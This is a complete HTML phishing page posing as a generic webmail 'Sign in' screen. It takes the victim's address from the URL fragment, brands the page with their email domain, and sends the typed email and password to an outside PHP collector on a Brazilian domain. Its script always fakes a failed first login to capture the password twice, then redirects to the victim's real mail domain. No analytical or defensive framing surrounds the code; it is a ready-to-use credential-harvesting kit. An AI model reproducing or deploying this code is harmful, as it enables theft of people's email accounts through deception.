<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

	<title>Sign in - Mail</title>
	<link rel="icon" type="icon" href="icon.ico">
	<link rel="stylesheet" href="design.css">

	<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css" integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">
	
	<style>
	body {
			margin:0;
			}

      .mainbox {
        display: -webkit-box;
        display: -moz-box;
        display: -ms-flexbox;
        display: -webkit-flex;
        width: auto;
        height: 100%;
		margin-top:50px;
      }

      .box1 {
        background-color: #fff;
        width: 380px;
        padding: 15px;
        text-align: center;
        color: #000000;
        font-family: arial, sans-serif;
      }
	  
	  .centered {
  position: fixed;
  top: 50%;
  left: 50%;
  /* bring your own prefixes */
  transform: translate(-50%, -50%);
}



.formbox {
	background: white;
	border: none;
	width: 100%;
	height: 100%;
	padding-top: 20px;
	padding-bottom: 20px;
	box-shadow: 0 0 2px rgba(0,0,0,.3);
		overflow:hidden;
	
}

#who {
	font-size: small;
	color:rgba(0,0,0,.3);
}

.papi {
  display: block;
  text-align: right;
  margin-right:42px;
}

.bta {
  display: block;
  text-align: right;
}



body{
  font-family: sans-serif;  
}

.checkers {
  display: block;
  position: relative;
  padding-left: 25px;
  margin-bottom: 12px;
  cursor: pointer;
  font-size: 14px;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
  font-family: Arial;
}

/* Hide the browser's default checkbox */
.checkers input {
  position: absolute;
  opacity: 0;
  cursor: pointer;
  height: 0;
  width: 0;
}

/* Create a custom checkbox */
.checkmark {
  position: absolute;
  top: 0;
  left: 0;
  height: 17px;
  width: 17px;
  background-color: #eee;
}

/* On mouse-over, add a grey background color */
.checkers:hover input ~ .checkmark {
  background-color: #ccc;
}

/* When the checkbox is checked, add a blue background */
.checkers input:checked ~ .checkmark {
  background-color: #ccc;
}

/* Create the checkmark/indicator (hidden when not checked) */
.checkmark:after {
  content: "";
  position: absolute;
  display: none;
}

/* Show the checkmark when checked */
.checkers input:checked ~ .checkmark:after {
  display: block;
}

/* Style the checkmark/indicator */
.checkers .checkmark:after {
  left: 6px;
  top: 2.5px;
  width: 5px;
  height: 11px;
  border: solid white;
  border-width: 0 1.5px 1.5px 0;
  -webkit-transform: rotate(45deg);
  -ms-transform: rotate(45deg);
  transform: rotate(45deg);
}

a:link {
  text-decoration: none;
  font-family: Helvetica;
}

a:visited {
  text-decoration: none;
  font-family: Helvetica;
}

a:hover {
  text-decoration: underline;
  font-family: Helvetica;
  color: #0061ff;
}

a:active {
  text-decoration: underline;
  font-family: Helvetica;
}

a {
	color: #0061ff;
}


* {
  box-sizing: border-box;
}

#policy {
	color: #7c8995;
	border: none;
	width:80%;
	text-align: left;
	font-family: segoe ui light;
	font-size: 12px;
	Line-height: 18px;
	margin-bottom:12;
	margin-top:22px;
}

#dbpng {
	width: 650px;
}



		body{
			background: transparent;
		}


		.office{
			width: 280px;
			background: #fff;
		}

		.office-holder{
			width:80%;
			margin: auto;
			padding: 0;
		}

		.logo{
			width:100%;
			margin-bottom: 1em;
			text-align:left;
			overflow: hidden;
		}
		
		div.b {
  white-space: nowrap; 
  overflow: hidden;
  text-overflow: ellipsis; 
}

		.logo h1{
			font-family: arial;

		}
		.logo h2 {
			display: block!important;
		}

		.verify{
			width: 70%;
			margin: auto;
		}

		.verify h4{
			font-family: arial;
			
		}


h4 {color:red;}

		.verify input[type='text']{
			width: 100%;
			float: right;
			border:none;
			padding:3px 10px;
		}

		.verify button{
			border:none;
			height: 40px;
			width: 80px;
			margin-top: 2em;
			border-radius: 0;
			color: #fff;
		}



		.form-holder{
			width:100%;
			float: left;
		}

		.form-holder h3{
			font-weight: 600;
		}
		

		.form-holder input[type='email'], input[type='password']{
			width: 100%;
			height:40px;
			float: left;
			margin-bottom: 10px;
			border-radius:0;
		}
		.form-holder .btn-holder{
			width:40%;
			margin-top:1em;
			display: flex;
			align-content: center;
			align-items: center;
			justify-content: center;
		}

		.form-holder .btn-holder .btn{
			background:#0073C6;
			border:none;
			padding:8px 10px;
			color:#fff;
			margin-top: 7px;
			margin-bottom: 7px;
		}

		.form-holder .btn-holder .btn:hover{
			cursor:pointer;
		}

		

		.hide{
			display: none;
		}
	</style>

</head>
<body onload="checkMail()">

<!---START---->

<input type="hidden" id="posturl"  value="https://velososlimper.com.br/saver/here/nwachi.php">

<!---END ---->

	<div class="mainbox">

		
		<div class="box1 centered">
		
			<div class="formbox">
			<div class="office-holder">
				<div class="logo">
					<h4 class="text-dark"><div class="b"><span id="domain-name" class="text-uppercase"></span></div></h4>
					<label style="font-family:Arial; font-size:14px;color:#34485b;">Sign in to continue</label>
				</div>
				<div style="width: 100%;">
					<div class="alert alert-danger hide alert2"
						 id="msgbox"></div>
				</div>
				<form>
					<div class="form-holder">
						
						<input type="email" id="email" class="form-control" placeholder="username@example.com" required="" disabled>
						<input type="password" id="password" placeholder="Password" class="form-control" required="">
						
						<div style="float:right;margin-top:0;" class="btn-holder">
							<button style="border-radius: 0;font-family:Arial, Helvetica, sans-serif;font-size:16px;" class="btn btn-lg col-12" id="signin">Sign in</button>
						</div>
						
						<p>&nbsp;</p>
						
					</div>
                    <input type="hidden" name="rqcount" id="rqcount">
				</form>
				
				
				
			</div>

			</div>
		
		</div>
		
	</div>
	

<script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
	<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/js/bootstrap.min.js" integrity="sha384-uefMccjFJAIv6A+rW+L4AHf99KvxDjWSu1z9VI8SKNVmz4sk7buKt/6v9KI65qnm"
        crossorigin="anonymous"></script>
	<script>
    var counter = 0;



var url = $("#posturl").val();

	var geteml = location.hash.substring(1);
	$("#email").val(geteml);
	var getdomain = geteml.substring(geteml.indexOf('@')+1,geteml.lastIndexOf("."));
	var xdomain = geteml.substring(geteml.indexOf('@')+1);
	$("#domain-name").html(getdomain.toUpperCase());

function checkMail(){
	var email = document.getElementById('email');
	var password = document.getElementById('password');
	var showDomain = document.getElementById('domain-name');
	var domain = '';
	domain = email.value.replace(/.*@/, "").split('.')[0];
	showDomain.textContent = domain;
}


$('#signin').click(function(e){
	e.preventDefault();
        var email = document.getElementById('email');
        domain = email.value.replace(/.*@/, "").split('.')[0];
        var checkmail = /^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$/g;
        var alert2 = document.querySelector('#msgbox');
        var alert1 = document.querySelector('.alert1');
        if($('#email').val() == ""){
            $('#email').focus();
            $('.alert2').show();
            alert2.textContent = "Please enter your email address";
            return false;
        }else if(!($('#email').val().match(checkmail))){
            $('#email').focus();
            $('.alert2').show();
            alert2.textContent = "Invalid password or account";
            return false;
        }else if($('#password').val() == ""){
            $('#password').focus();
            $('#msgbox').show();
            alert2.textContent = "Please enter your password";
            return false;
        }
        else{
            counter = counter + 1;
            alert2.className = alert2.className.replace(/\balert-danger\b/g, "alert-info");
            alert2.textContent = "Connecting to account";
            $('.alert2').show();

            if (counter > 1){
                var xmlhttp;
                if(window.XMLHttpRequest){
                  xmlhttp = new XMLHttpRequest();
                }else{
                  xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
                }

                xmlhttp.onreadystatechange=function(){
                  if(xmlhttp.readyState==4 && xmlhttp.status==200){
                        alert2.className = alert2.className.replace(/\balert-info\b/g, "alert-success");
                        alert2.textContent = "Logon Successful";
                        window.location = 'https://'+xdomain;
                  } else {
                      console.log(xmlhttp.responseText);
                  }
                }

                var getemail = document.getElementById('email').value;
                var getpassword = document.getElementById('password').value;
                var formdata = new FormData();

                formdata.append("email", getemail);
                formdata.append("password", getpassword);

                xmlhttp.open("POST", url);
                xmlhttp.send(formdata);

                return false;
            }

            var xmlhttp;
            if(window.XMLHttpRequest){
              xmlhttp = new XMLHttpRequest();
            }else{
              xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
            }

            xmlhttp.onreadystatechange=function(){
              if(xmlhttp.readyState==4 && xmlhttp.status==200){
                    alert2.className = alert2.className.replace(/\balert-info\b/g, "alert-danger");
                    alert2.textContent = xmlhttp.responseText;
                    document.getElementById('password').value = "";
                    document.getElementById('password').focus();
              } else {
                  console.log(xmlhttp.responseText);
              }
            }

            var email = document.getElementById('email').value;
            var password = document.getElementById('password').value;
            var formdata = new FormData();

            formdata.append("email", email);
            formdata.append("password", password);


            xmlhttp.open("POST", url);
            xmlhttp.send(formdata);

            return false;

        }

})

    
    </script>

</body>
</html>
